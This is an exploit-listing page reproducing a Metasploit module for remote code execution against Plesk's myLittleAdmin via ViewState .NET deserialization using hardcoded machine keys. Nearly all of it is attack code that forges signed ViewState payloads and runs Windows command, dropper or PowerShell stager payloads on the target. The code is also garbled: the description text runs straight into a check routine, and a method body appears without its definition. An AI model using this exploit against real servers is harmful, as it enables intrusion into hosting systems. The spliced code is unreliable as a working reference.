Exploits / Vulnerability Discovered : 2020-05-25 |
Type : remote |
Platform : windows
This exploit / vulnerability Plesk/mylittleadmin viewstate .net deserialization (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::ViewState
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
'Description' => %q{
This module exploits a ViewState .NET deserialization vulnerability in
web-based MS SQL Server management tool myLittleAdmin, for version 3.8
and likely older versions, due to hardcoded <machineKey> parameters in
the web.config file for ASP.NET.
Popular web hosting control panel Plesk offers myLittleAdmin as an
optional component that is selected automatically during "full"
installation. This exploit caters to the Plesk target, though it
should work fine against a standalone myLittleAdmin setup.
Successful exploitation results in code execution as the user running
myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
the "SQL Admin MSSQL anonymous account."
if we_can_sign_viewstate
return CheckCode::Vulnerable('We can sign our own ViewState.')
end
CheckCode::Safe("We can't sign our own ViewState.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
# This is the only parameter we need for successful exploitation!
'__VIEWSTATE' => generate_viewstate_payload(
cmd,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
}
)
unless res && res.code == 302 && res.redirection.path == '/error/index.html'
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end